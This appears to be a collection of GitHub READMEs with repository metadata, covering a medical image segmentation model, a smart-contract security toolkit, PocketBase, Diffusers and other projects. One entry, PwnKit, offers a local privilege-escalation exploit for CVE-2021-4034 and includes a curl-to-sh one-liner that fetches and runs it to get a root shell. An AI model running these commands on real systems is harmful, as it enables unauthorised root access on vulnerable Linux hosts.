๐Ÿ˜ๅ›ฝๅ†…ๅค–่ฎก็ฎ—ๆœบ็š„ไผ˜็ง€่ฏพ็จ‹๏ผŒๅŒ…ๅซMITใ€CMU็ญ‰ไธ–็•ŒCSๅๆ ก๏ผŒ๐Ÿ”ฅ๐Ÿ”ฅๅ…ถไธญๅŒ…ๅซ่ฎก็ฎ—ๆœบๅŸบ็ก€ๅญฆ็ง‘๏ผˆๆ“ไฝœ็ณป็ปŸใ€่ฎก็ฎ—ๆœบ็ฝ‘็ปœใ€็ผ–่ฏ‘ๅ™จใ€ๆ•ฐๆฎๅบ“ใ€ๆ•ฐๆฎ็ป“ๆž„ไธŽ็ฎ—ๆณ•็ญ‰๏ผ‰ไปฅๅŠไบบๅทฅๆ™บ่ƒฝ&AI็ญ‰้ซ˜็บง็ง‘็›ฎ๏ผŒๆฌข่ฟŽ้€š่ฟ‡PRๅฝขๅผ่ดก็Œฎ๏ผ
null
0
1
0
29
1
1
0
AngeLouCN/Min_Max_Similarity
# Min_Max_Similarity A contrastive learning based semi-supervised segmentation network for medical image segmentation This repository contains the implementation of a novel contrastive learning based semi-segmentation networks to segment the surgical tools. [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/min-max-similarity-a-contrastive-learning/semi-supervised-semantic-segmentation-on-33)](https://paperswithcode.com/sota/semi-supervised-semantic-segmentation-on-33?p=min-max-similarity-a-contrastive-learning) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/min-max-similarity-a-contrastive-learning/semi-supervised-semantic-segmentation-on-2017)](https://paperswithcode.com/sota/semi-supervised-semantic-segmentation-on-2017?p=min-max-similarity-a-contrastive-learning) <div align=center><img src="https://github.com/AngeLouCN/Min_Max_Similarity/blob/main/img/architecture.jpg" width="1000" height="450" alt="Result"/></div> <p align="center"><b>Fig. 1. The architecture of Min-Max Similarity.</b></p> **:fire: NEWS :fire:** **The full paper is available:** [Min-Max Similarity](https://arxiv.org/abs/2203.15177) **:fire: NEWS :fire:** **The paper has been accepted by IEEE Transactions on Medical Imaging.** The early access is available at [Here](https://ieeexplore.ieee.org/document/10098633/keywords#keywords). ## Environment - python==3.6 - packages: ``` conda install pytorch==1.8.0 torchvision==0.9.0 torchaudio==0.8.0 cudatoolkit=11.1 -c pytorch -c conda-forge ``` ``` conda install opencv-python pillow numpy matplotlib ``` - Clone this repository ``` git clone https://github.com/AngeLouCN/Min_Max_Similarity ``` ## Data Preparation We use five dataset to test its performance: - [Kvasir-instrument](https://datasets.simula.no/kvasir-instrument/) - [EndoVis'17](https://endovissub2017-roboticinstrumentsegmentation.grand-challenge.org/) - Cochlear Implant - [RoboTool](https://www.synapse.org/#!Synapse:syn22427422) - [ART-NET](https://github.com/kamruleee51/ART-Net) **File structure** ``` |-- data | |-- kvasir | | |-- train | | | |--image | | | |--mask | | |-- test | | | |--image | | | |--mask | |-- EndoVis17 | | |-- train | | | |--image | | | |--mask | | |-- test | | | |--image | | | |--mask ...... ``` **You can also test on some other public medical image segmentation dataset with above file architecture** ## Usage - **Training:** You can change the hyper-parameters like labeled ratio, leanring rate, and e.g. in ```train_mms.py```, and directly run the code. - **Testing:** You can change the dataset name in ```test.py``` and run the code. ## Segmentation Performance <div align=center><img src="https://github.com/AngeLouCN/Min_Max_Similarity/blob/main/img/seg_result.jpg" width="650" height="550" alt="Result"/></div> <p align="center"><b>Fig. 2. Visual comparison of our method with state-of-the-art models. Segmentation results are shown for 50% of labeled training data for Kvasir-instrument, EndVisโ€™17, ART-NET and RoboTool, and 2.4% labeled training data for cochlear implant. From left to right are EndoVisโ€™17, Kvasir-instrument, ART-NET, RoboTool, Cochlear implant and region of interest (ROI) of Cochlear implant. </b></p> ## Citation ``` @article{lou2023min, title={Min-Max Similarity: A Contrastive Semi-Supervised Deep Learning Network for Surgical Tools Segmentation}, author={Lou, Ange and Tawfik, Kareem and Yao, Xing and Liu, Ziteng and Noble, Jack}, journal={IEEE Transactions on Medical Imaging}, year={2023}, publisher={IEEE} } ``` ## Acknowledgement Our code is based on the [Duo-SegNet](https://github.com/himashi92/Duo-SegNet), we thank their excellent work and repository.
A contrastive learning based semi-supervised segmentation network for medical image segmentation
contrastive-learning,semi-supervised-learning,medical-image-segmentation,surgical-tools-segmentation,medical-video-analysis,video-segmentation
0
1
0
62
4
1
0
ly4k/PwnKit
# PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation ## Usage Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. ```bash sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" ``` ![](./imgs/oneliner.png) ### Manually ```bash curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit # interactive shell ./PwnKit 'id' # single command ``` ![](./imgs/exploit.png) ### Patched Running the exploit against patched versions will yield the following output. ![](./imgs/patched.png) ### Build ```bash gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC ``` ## Technical Details - https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 ## References - https://github.com/arthepsy/CVE-2021-4034/
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation
cve-2021-4034
0
2
1
10
5
1
0
nascentxyz/simple-security-toolkit
# Simple Security Toolkit This repo is a collection of practical security-focused guides and checklists for smart contract development, assembled by the [Nascent](https://www.nascent.xyz/) team to share with our portfolio companies and others in the ecosystem who might find it useful. It is not intended to be comprehensive; it skews towards practical and opinionated recommendations that we find to be appropriate particularly for teams developing and managing early versions of a protocol. ### Contents 1. **[Development Process](https://github.com/nascentxyz/simple-security-toolkit/blob/main/development-process.md)** One of the most crucial factors in having a secure codebase is a solid development process: "an ounce of prevention is worth a pound of cure." This document gives an example development process that we, at Nascent, have found works well. It walks through the steps from initial design and feature requests -> specification -> evaluation -> implementation -> testing -> deployment -> monitoring. 2. **[Audit Readiness Checklist](https://github.com/nascentxyz/simple-security-toolkit/blob/main/audit-readiness-checklist.md)** Audits are expensive, time consuming, and need to be scheduled months in advance. Completing this checklist helps ensure a codebase is ready for outside review and helps catch as much low-hanging fruit as possible. This will allow the auditors to focus their time and attention on identifying deeper and more critical vulnerabilities. 3. **[Pre-Launch Security Checklist](https://github.com/nascentxyz/simple-security-toolkit/blob/main/pre-launch-security-checklist.md)** Before deploying code to mainnet, teams should complete this checklist to make sure they have taken the necessary steps to enable reporting and responding to potential bugs or security incidents. 4. **[Incident Response Plan Template](https://github.com/nascentxyz/simple-security-toolkit/blob/main/incident-response-plan-template.md)** No project ever expects to have a security incident. Having a plan documented in advance can help a team respond swiftly and calmly in the heat of the moment when adrenaline is running high. ### Contributing Thanks for your interest in contributing! We are *very* opinionated as to what gets added to this repository. However, we are open to outside contributors putting forth suggestions and encourage you to do so. If you have ideas for a new document, it is likely best to open an issue before starting on a PR to gauge our support. If you have suggestions to existing documents, you can open a PR right away. Feel free to fork this repo and make it your own. Share your ideas with your team and iterate. If you find things that may be useful to a broader set of teams, consider opening a PR!
A collection of practical security-focused guides and checklists for smart contract development
crypto,security,security-tools,smart-contracts,solidity
0
13
13
58
0
1
0
RayeRen/acad-homepage.github.io
<h1 align="center"> AcadHomepage </h1> <div align="center"> [![](https://img.shields.io/github/stars/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/forks/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/issues/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/license/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io/blob/main/LICENSE) | [ไธญๆ–‡ๆ–‡ๆกฃ](./docs/README-zh.md) </div> <p align="center">A Modern and Responsive Academic Personal Homepage</p> <p align="center"> <br> <img src="docs/screenshot.png" width="100%"/> <br> </p> Some examples: - [Demo Page](https://rayeren.github.io/acad-homepage.github.io/) - [Personal Homepage of the author](https://rayeren.github.io/) ## Key Features - **Automatically update google scholar citations**: using the google scholar crawler and github action, this REPO can update the author citations and publication citations automatically. - **Support Google analytics**: you can trace the traffics of your homepage by easy configuration. - **Responsive**: this homepage automatically adjust for different screen sizes and viewports. - **Beautiful and Simple Design**: this homepage is beautiful and simple, which is very suitable for academic personal homepage. - **SEO**: search Engine Optimization (SEO) helps search engines find the information you publish on your homepage easily, then rank it against similar websites. ## Quick Start 1. Fork this REPO and rename to `USERNAME.github.io`, where `USERNAME` is your github USERNAME. 1. Configure the google scholar citation crawler: 1. Find your google scholar ID in the url of your google scholar page (e.g., https://scholar.google.com/citations?user=SCHOLAR_ID), where `SCHOLAR_ID` is your google scholar ID. 1. Set GOOGLE_SCHOLAR_ID variable to your google scholar ID in `Settings -> Secrets -> Actions -> New repository secret` of the REPO website with `name=GOOGLE_SCHOLAR_ID` and `value=SCHOLAR_ID`. 1. Click the `Action` of the REPO website and enable the workflows by clicking *"I understand my workflows, go ahead and enable them"*. This github action will generate google scholar citation stats data `gs_data.json` in `google-scholar-stats` branch of your REPO. When you update your main branch, this action will be triggered. This action will also be trigger 08:00 UTC everyday. 1. Generate favicon using [favicon-generator](https://redketchup.io/favicon-generator) and download all generated files to `REPO/images`. 1. Modify the configuration of your homepage `_config.yml`: 1. `title`: the title of your homepage 1. `description`: the description of your homepage 1. `repository`: USER_NAME/REPO_NAME 1. `google_analytics_id` (optional): google analytics ID 1. SEO Related keys (optional): get these keys from search engine consoles (e.g. Google, Bing and Baidu) and paste here. 1. `author`: the author information of this homepage, including some other websites, emails, city and univeristy. 1. More configuration details are described in the comments. 1. Add your homepage content in `_pages/about.md`. 1. You can use html+markdown syntax just same as jekyll. 1. You can use a `<span>` tag with class `show_paper_citations` and attribute `data` to display the citations of your paper. Set the data to the google scholar paper ID. For ```html <span class='show_paper_citations' data='DhtAFkwAAAAJ:ALROH1vI_8AC'></span> ``` > Q: How to get the google scholar paper ID? > A: Enter your google scholar homepage and click the paper name. Then you can see the paper ID from `citation_for_view=XXXX`, where `XXXX` is the required paper ID. 1. Your page will be published at `https://USERNAME.github.io`. ## Debug Locally 1. Clone your REPO to local using `git clone`. 1. Install Jekyll building environment, including `Ruby`, `RubyGems`, `GCC` and `Make` following [the installation guide](https://jekyllrb.com/docs/installation/#requirements). 1. Run `bash run_server.sh` to start Jekyll livereload server. 1. Open http://127.0.0.1:4000 in your browser. 1. If you change the source code of the website, the livereload server will automatically refresh. 1. When you finish the modification of your homepage, `commit` your changings and `push` to your remote REPO using `git` command. # Acknowledges - AcadHomepage incorporates Font Awesome, which is distributed under the terms of the SIL OFL 1.1 and MIT License. - AcadHomepage is influenced by the github repo [mmistakes/minimal-mistakes](https://github.com/mmistakes/minimal-mistakes), which is distributed under the MIT License. - AcadHomepage is influenced by the github repo [academicpages/academicpages.github.io](https://github.com/academicpages/academicpages.github.io), which is distributed under the MIT License.
AcadHomepage: A Modern and Responsive Academic Personal Homepage
null
0
1
42
41
17
2
1
MycroftAI/mimic3
# Mimic 3 ![mimic 3 mark 2](img/mimic3-hero.jpg) A fast and local neural text to speech system developed by [Mycroft](https://mycroft.ai/) for the [Mark II](https://mycroft.ai/product/mark-ii/). * [Available voices](https://github.com/MycroftAI/mimic3-voices) * [Documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3) * [How does it work?](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#how-it-works) ## Quickstart ### Mycroft TTS Plugin ``` sh # Install system packages sudo apt-get install libespeak-ng1 # Ensure that you're using the latest pip mycroft-pip install --upgrade pip # Install plugin mycroft-pip install mycroft-plugin-tts-mimic3[all] # Activate plugin mycroft-config set tts.module mimic3_tts_plug # Start mycroft mycroft-start all ``` See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#tts-plugin-for-mycroft-ai) for more details. ### Web Server ``` sh mkdir -p "${HOME}/.local/share/mycroft/mimic3" chmod a+rwx "${HOME}/.local/share/mycroft/mimic3" docker run \ -it \ -p 59125:59125 \ -v "${HOME}/.local/share/mycroft/mimic3:/home/mimic3/.local/share/mycroft/mimic3" \ 'mycroftai/mimic3' ``` Visit [http://localhost:59125](http://localhost:59125) or from another terminal: ``` sh curl -X POST --data 'Hello world.' --output - localhost:59125/api/tts | aplay ``` See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#web-server) for more details. ### Command-Line Tool ``` sh # Install system packages sudo apt-get install libespeak-ng1 # Create virtual environment python3 -m venv .venv source .venv/bin/activate pip3 install --upgrade pip pip3 install mycroft-mimic3-tts[all] ``` Now you can run: ``` sh mimic3 'Hello world.' | aplay ``` Use `mimic3-server` and `mimic3 --remote ...` for repeated usage (much faster). See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#command-line-interface) for more details. --- ## License Mimic 3 is available under the [AGPL v3 license](LICENSE)
A fast local neural text to speech engine for Mycroft
null
3
10
9
248
39
1
0
pocketbase/pocketbase
<p align="center"> <a href="https://pocketbase.io" target="_blank" rel="noopener"> <img src="https://i.imgur.com/5qimnm5.png" alt="PocketBase - open source backend in 1 file" /> </a> </p> <p align="center"> <a href="https://github.com/pocketbase/pocketbase/actions/workflows/release.yaml" target="_blank" rel="noopener"><img src="https://github.com/pocketbase/pocketbase/actions/workflows/release.yaml/badge.svg" alt="build" /></a> <a href="https://github.com/pocketbase/pocketbase/releases" target="_blank" rel="noopener"><img src="https://img.shields.io/github/release/pocketbase/pocketbase.svg" alt="Latest releases" /></a> <a href="https://pkg.go.dev/github.com/pocketbase/pocketbase" target="_blank" rel="noopener"><img src="https://godoc.org/github.com/pocketbase/pocketbase?status.svg" alt="Go package documentation" /></a> </p> [PocketBase](https://pocketbase.io) is an open source Go backend, consisting of: - embedded database (_SQLite_) with **realtime subscriptions** - built-in **files and users management** - convenient **Admin dashboard UI** - and simple **REST-ish API** **For documentation and examples, please visit https://pocketbase.io/docs.** > [!WARNING] > Please keep in mind that PocketBase is still under active development > and therefore full backward compatibility is not guaranteed before reaching v1.0.0. ## API SDK clients The easiest way to interact with the API is to use one of the official SDK clients: - **JavaScript - [pocketbase/js-sdk](https://github.com/pocketbase/js-sdk)** (_browser and node_) - **Dart - [pocketbase/dart-sdk](https://github.com/pocketbase/dart-sdk)** (_web, mobile, desktop_) ## Overview ### Use as standalone app You could download the prebuilt executable for your platform from the [Releases page](https://github.com/pocketbase/pocketbase/releases). Once downloaded, extract the archive and run `./pocketbase serve` in the extracted directory. The prebuilt executables are based on the [`examples/base/main.go` file](https://github.com/pocketbase/pocketbase/blob/master/examples/base/main.go) and comes with the JS VM plugin enabled by default which allows to extend PocketBase with JavaScript (_for more details please refer to [Extend with JavaScript](https://pocketbase.io/docs/js-overview/)_). ### Use as a Go framework/toolkit PocketBase is distributed as a regular Go library package which allows you to build your own custom app specific business logic and still have a single portable executable at the end. Here is a minimal example: 0. [Install Go 1.21+](https://go.dev/doc/install) (_if you haven't already_) 1. Create a new project directory with the following `main.go` file inside it: ```go package main import ( "log" "net/http" "github.com/labstack/echo/v5" "github.com/pocketbase/pocketbase" "github.com/pocketbase/pocketbase/apis" "github.com/pocketbase/pocketbase/core" ) func main() { app := pocketbase.New() app.OnBeforeServe().Add(func(e *core.ServeEvent) error { // add new "GET /hello" route to the app router (echo) e.Router.AddRoute(echo.Route{ Method: http.MethodGet, Path: "/hello", Handler: func(c echo.Context) error { return c.String(200, "Hello world!") }, Middlewares: []echo.MiddlewareFunc{ apis.ActivityLogger(app), }, }) return nil }) if err := app.Start(); err != nil { log.Fatal(err) } } ``` 2. To init the dependencies, run `go mod init myapp && go mod tidy`. 3. To start the application, run `go run main.go serve`. 4. To build a statically linked executable, you can run `CGO_ENABLED=0 go build` and then start the created executable with `./myapp serve`. > [!NOTE] > PocketBase embeds SQLite, but doesn't require CGO. > > If CGO is enabled (aka. `CGO_ENABLED=1`), it will use [mattn/go-sqlite3](https://pkg.go.dev/github.com/mattn/go-sqlite3) driver, otherwise - [modernc.org/sqlite](https://pkg.go.dev/modernc.org/sqlite). > Enable CGO only if you really need to squeeze the read/write query performance at the expense of complicating cross compilation. _For more details please refer to [Extend with Go](https://pocketbase.io/docs/go-overview/)._ ### Building and running the repo main.go example To build the minimal standalone executable, like the prebuilt ones in the releases page, you can simply run `go build` inside the `examples/base` directory: 0. [Install Go 1.21+](https://go.dev/doc/install) (_if you haven't already_) 1. Clone/download the repo 2. Navigate to `examples/base` 3. Run `GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build` (_https://go.dev/doc/install/source#environment_) 4. Start the created executable by running `./base serve`. Note that the supported build targets by the pure Go SQLite driver at the moment are: ``` darwin amd64 darwin arm64 freebsd amd64 freebsd arm64 linux 386 linux amd64 linux arm linux arm64 linux ppc64le linux riscv64 linux s390x windows amd64 windows arm64 ``` ### Testing PocketBase comes with mixed bag of unit and integration tests. To run them, use the standard `go test` command: ```sh go test ./... ``` Check also the [Testing guide](http://pocketbase.io/docs/testing) to learn how to write your own custom application tests. ## Security If you discover a security vulnerability within PocketBase, please send an e-mail to **support at pocketbase.io**. All reports will be promptly addressed, and you'll be credited accordingly. ## Contributing PocketBase is free and open source project licensed under the [MIT License](LICENSE.md). You are free to do whatever you want with it, even offering it as a paid service. You could help continuing its development by: - [Contribute to the source code](CONTRIBUTING.md) - [Suggest new features and report issues](https://github.com/pocketbase/pocketbase/issues) PRs for new OAuth2 providers, bug fixes, code optimizations and documentation improvements are more than welcome. But please refrain creating PRs for _new features_ without previously discussing the implementation details. PocketBase has a [roadmap](https://github.com/orgs/pocketbase/projects/2) and I try to work on issues in specific order and such PRs often come in out of nowhere and skew all initial planning with tedious back-and-forth communication. Don't get upset if I close your PR, even if it is well executed and tested. This doesn't mean that it will never be merged. Later we can always refer to it and/or take pieces of your implementation when the time comes to work on the issue (don't worry you'll be credited in the release notes).
Open Source realtime backend in 1 file
authentication,backend,realtime,golang
138
48
199
1,397
40
3
1
t3-oss/create-t3-app
./cli/README.md
The best way to start a full-stack, typesafe Next.js app
cli,next-auth,nextjs,npx,tailwindcss,trpc,typescript,prisma,t3,t3-stack
128
334
1,276
1,288
42
8
7
huggingface/diffusers
<!--- Copyright 2022 - The HuggingFace Team. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <p align="center"> <br> <img src="https://raw.githubusercontent.com/huggingface/diffusers/main/docs/source/en/imgs/diffusers_library.jpg" width="400"/> <br> <p> <p align="center"> <a href="https://github.com/huggingface/diffusers/blob/main/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/huggingface/datasets.svg?color=blue"></a> <a href="https://github.com/huggingface/diffusers/releases"><img alt="GitHub release" src="https://img.shields.io/github/release/huggingface/diffusers.svg"></a> <a href="https://pepy.tech/project/diffusers"><img alt="GitHub release" src="https://static.pepy.tech/badge/diffusers/month"></a> <a href="CODE_OF_CONDUCT.md"><img alt="Contributor Covenant" src="https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg"></a> <a href="https://twitter.com/diffuserslib"><img alt="X account" src="https://img.shields.io/twitter/url/https/twitter.com/diffuserslib.svg?style=social&label=Follow%20%40diffuserslib"></a> </p> ๐Ÿค— Diffusers is the go-to library for state-of-the-art pretrained diffusion models for generating images, audio, and even 3D structures of molecules. Whether you're looking for a simple inference solution or training your own diffusion models, ๐Ÿค— Diffusers is a modular toolbox that supports both. Our library is designed with a focus on [usability over performance](https://huggingface.co/docs/diffusers/conceptual/philosophy#usability-over-performance), [simple over easy](https://huggingface.co/docs/diffusers/conceptual/philosophy#simple-over-easy), and [customizability over abstractions](https://huggingface.co/docs/diffusers/conceptual/philosophy#tweakable-contributorfriendly-over-abstraction). ๐Ÿค— Diffusers offers three core components: - State-of-the-art [diffusion pipelines](https://huggingface.co/docs/diffusers/api/pipelines/overview) that can be run in inference with just a few lines of code. - Interchangeable noise [schedulers](https://huggingface.co/docs/diffusers/api/schedulers/overview) for different diffusion speeds and output quality. - Pretrained [models](https://huggingface.co/docs/diffusers/api/models/overview) that can be used as building blocks, and combined with schedulers, for creating your own end-to-end diffusion systems. ## Installation We recommend installing ๐Ÿค— Diffusers in a virtual environment from PyPI or Conda. For more details about installing [PyTorch](https://pytorch.org/get-started/locally/) and [Flax](https://flax.readthedocs.io/en/latest/#installation), please refer to their official documentation. ### PyTorch With `pip` (official package): ```bash pip install --upgrade diffusers[torch] ``` With `conda` (maintained by the community): ```sh conda install -c conda-forge diffusers ``` ### Flax With `pip` (official package): ```bash pip install --upgrade diffusers[flax] ``` ### Apple Silicon (M1/M2) support Please refer to the [How to use Stable Diffusion in Apple Silicon](https://huggingface.co/docs/diffusers/optimization/mps) guide. ## Quickstart Generating outputs is super easy with ๐Ÿค— Diffusers. To generate an image from text, use the `from_pretrained` method to load any pretrained diffusion model (browse the [Hub](https://huggingface.co/models?library=diffusers&sort=downloads) for 25.000+ checkpoints): ```python from diffusers import DiffusionPipeline import torch pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16) pipeline.to("cuda") pipeline("An image of a squirrel in Picasso style").images[0] ``` You can also dig into the models and schedulers toolbox to build your own diffusion system: ```python from diffusers import DDPMScheduler, UNet2DModel from PIL import Image import torch scheduler = DDPMScheduler.from_pretrained("google/ddpm-cat-256") model = UNet2DModel.from_pretrained("google/ddpm-cat-256").to("cuda") scheduler.set_timesteps(50) sample_size = model.config.sample_size noise = torch.randn((1, 3, sample_size, sample_size), device="cuda") input = noise for t in scheduler.timesteps: with torch.no_grad(): noisy_residual = model(input, t).sample prev_noisy_sample = scheduler.step(noisy_residual, t, input).prev_sample input = prev_noisy_sample image = (input / 2 + 0.5).clamp(0, 1) image = image.cpu().permute(0, 2, 3, 1).numpy()[0] image = Image.fromarray((image * 255).round().astype("uint8")) image ``` Check out the [Quickstart](https://huggingface.co/docs/diffusers/quicktour) to launch your diffusion journey today! ## How to navigate the documentation | **Documentation** | **What can I learn?** | |---------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [Tutorial](https://huggingface.co/docs/diffusers/tutorials/tutorial_overview) | A basic crash course for learning how to use the library's most important features like using models and schedulers to build your own diffusion system, and training your own diffusion model. | | [Loading](https://huggingface.co/docs/diffusers/using-diffusers/loading_overview) | Guides for how to load and configure all the components (pipelines, models, and schedulers) of the library, as well as how to use different schedulers. | | [Pipelines for inference](https://huggingface.co/docs/diffusers/using-diffusers/pipeline_overview) | Guides for how to use pipelines for different inference tasks, batched generation, controlling generated outputs and randomness, and how to contribute a pipeline to the library. | | [Optimization](https://huggingface.co/docs/diffusers/optimization/opt_overview) | Guides for how to optimize your diffusion model to run faster and consume less memory. | | [Training](https://huggingface.co/docs/diffusers/training/overview) | Guides for how to train a diffusion model for different tasks with different training techniques. | ## Contribution We โค๏ธ contributions from the open-source community! If you want to contribute to this library, please check out our [Contribution guide](https://github.com/huggingface/diffusers/blob/main/CONTRIBUTING.md). You can look out for [issues](https://github.com/huggingface/diffusers/issues) you'd like to tackle to contribute to the library. - See [Good first issues](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) for general opportunities to contribute - See [New model/pipeline](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22New+pipeline%2Fmodel%22) to contribute exciting new diffusion models / diffusion pipelines - See [New scheduler](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22New+scheduler%22) Also, say ๐Ÿ‘‹ in our public Discord channel <a href="https://discord.gg/G7tWnz98XR"><img alt="Join us on Discord" src="https://img.shields.io/discord/823813159592001537?color=5865F2&logo=discord&logoColor=white"></a>. We discuss the hottest trends about diffusion models, help each other with contributions, personal projects or just hang out โ˜•. ## Popular Tasks & Pipelines <table> <tr> <th>Task</th> <th>Pipeline</th> <th>๐Ÿค— Hub</th> </tr> <tr style="border-top: 2px solid black"> <td>Unconditional Image Generation</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/ddpm"> DDPM </a></td> <td><a href="https://huggingface.co/google/ddpm-ema-church-256"> google/ddpm-ema-church-256 </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/text2img">Stable Diffusion Text-to-Image</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-v1-5"> runwayml/stable-diffusion-v1-5 </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/unclip">unCLIP</a></td> <td><a href="https://huggingface.co/kakaobrain/karlo-v1-alpha"> kakaobrain/karlo-v1-alpha </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/deepfloyd_if">DeepFloyd IF</a></td> <td><a href="https://huggingface.co/DeepFloyd/IF-I-XL-v1.0"> DeepFloyd/IF-I-XL-v1.0 </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/kandinsky">Kandinsky</a></td> <td><a href="https://huggingface.co/kandinsky-community/kandinsky-2-2-decoder"> kandinsky-community/kandinsky-2-2-decoder </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/controlnet">ControlNet</a></td> <td><a href="https://huggingface.co/lllyasviel/sd-controlnet-canny"> lllyasviel/sd-controlnet-canny </a></td> </tr> <tr> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/pix2pix">InstructPix2Pix</a></td> <td><a href="https://huggingface.co/timbrooks/instruct-pix2pix"> timbrooks/instruct-pix2pix </a></td> </tr> <tr> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/img2img">Stable Diffusion Image-to-Image</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-v1-5"> runwayml/stable-diffusion-v1-5 </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-guided Image Inpainting</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/inpaint">Stable Diffusion Inpainting</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-inpainting"> runwayml/stable-diffusion-inpainting </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Image Variation</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/image_variation">Stable Diffusion Image Variation</a></td> <td><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers"> lambdalabs/sd-image-variations-diffusers </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Super Resolution</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/upscale">Stable Diffusion Upscale</a></td> <td><a href="https://huggingface.co/stabilityai/stable-diffusion-x4-upscaler"> stabilityai/stable-diffusion-x4-upscaler </a></td> </tr> <tr> <td>Super Resolution</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/latent_upscale">Stable Diffusion Latent Upscale</a></td> <td><a href="https://huggingface.co/stabilityai/sd-x2-latent-upscaler"> stabilityai/sd-x2-latent-upscaler </a></td> </tr> </table> ## Popular libraries using ๐Ÿงจ Diffusers - https://github.com/microsoft/TaskMatrix - https://github.com/invoke-ai/InvokeAI - https://github.com/apple/ml-stable-diffusion - https://github.com/Sanster/lama-cleaner - https://github.com/IDEA-Research/Grounded-Segment-Anything - https://github.com/ashawkey/stable-dreamfusion - https://github.com/deep-floyd/IF - https://github.com/bentoml/BentoML - https://github.com/bmaltais/kohya_ss - +11.000 other amazing GitHub repositories ๐Ÿ’ช Thank you for using us โค๏ธ. ## Credits This library concretizes previous work by many different authors and would not have been possible without their great research and implementations. We'd like to thank, in particular, the following implementations which have helped us in our development and without which the API could not have been as polished today: - @CompVis' latent diffusion models library, available [here](https://github.com/CompVis/latent-diffusion) - @hojonathanho original DDPM implementation, available [here](https://github.com/hojonathanho/diffusion) as well as the extremely useful translation into PyTorch by @pesser, available [here](https://github.com/pesser/pytorch_diffusion) - @ermongroup's DDIM implementation, available [here](https://github.com/ermongroup/ddim) - @yang-song's Score-VE and Score-VP implementations, available [here](https://github.com/yang-song/score_sde_pytorch) We also want to thank @heejkoo for the very helpful overview of papers, code and resources on diffusion models, available [here](https://github.com/heejkoo/Awesome-Diffusion-Models) as well as @crowsonkb and @rromb for useful discussions and insights. ## Citation ```bibtex @misc{von-platen-etal-2022-diffusers, author = {Patrick von Platen and Suraj Patil and Anton Lozhkov and Pedro Cuenca and Nathan Lambert and Kashif Rasul and Mishig Davaadorj and Dhruv Nair and Sayak Paul and William Berman and Yiyi Xu and Steven Liu and Thomas Wolf}, title = {Diffusers: State-of-the-art diffusion models}, year = {2022}, publisher = {GitHub}, journal = {GitHub repository}, howpublished = {\url{https://github.com/huggingface/diffusers}} } ```
๐Ÿค— Diffusers: State-of-the-art diffusion models for image and audio generation in PyTorch and FLAX.
